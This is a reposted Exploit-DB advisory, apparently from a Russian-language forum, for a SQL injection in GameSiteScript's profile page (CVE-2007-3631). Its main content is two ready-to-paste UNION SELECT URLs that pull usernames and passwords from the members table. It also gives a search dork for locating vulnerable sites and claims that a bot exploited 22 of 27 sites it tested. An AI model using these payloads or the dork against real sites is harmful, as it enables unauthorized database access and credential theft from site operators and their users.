- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 4159
- Проверка EDB
-
- Пройдено
- Автор
- XENDUER77
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2007-3631
- Дата публикации
- 2007-07-07
Код:
###############################################
####### GameSiteScript (Profile)($id) SQL-Injection Exploit
###############################################
### Vulnerability Discovered By: Xenduer77
### ---July 7th, 2007
###############################################
{$id} Is passed straight to the query without being filtered.
###############################################
SQL-INJECTION:
###############################################
For Version 3.1:
-------
http://whatever.com/iindex.php?params=profile/view/'+union+select+0,username,0,0,0,0,0,0,0,0,0,0,0,0,password,0,0,0,0,0,0,0,0+from+members+where+id='1
Prior To 3.1:
-------
http://whatever.com/index.php?params=profile/view/'+union+select+0,username,0,0,0,0,0,0,0,0,0,0,0,0,password,0,0,0,0,0,0+from+members+where+id='1
###Tested by a bot on 27 sites, 22 were exploited.
###############################################
Dork: "Powered by GameSiteScript"
###############################################
# milw0rm.com [2007-07-07]- Источник
- www.exploit-db.com
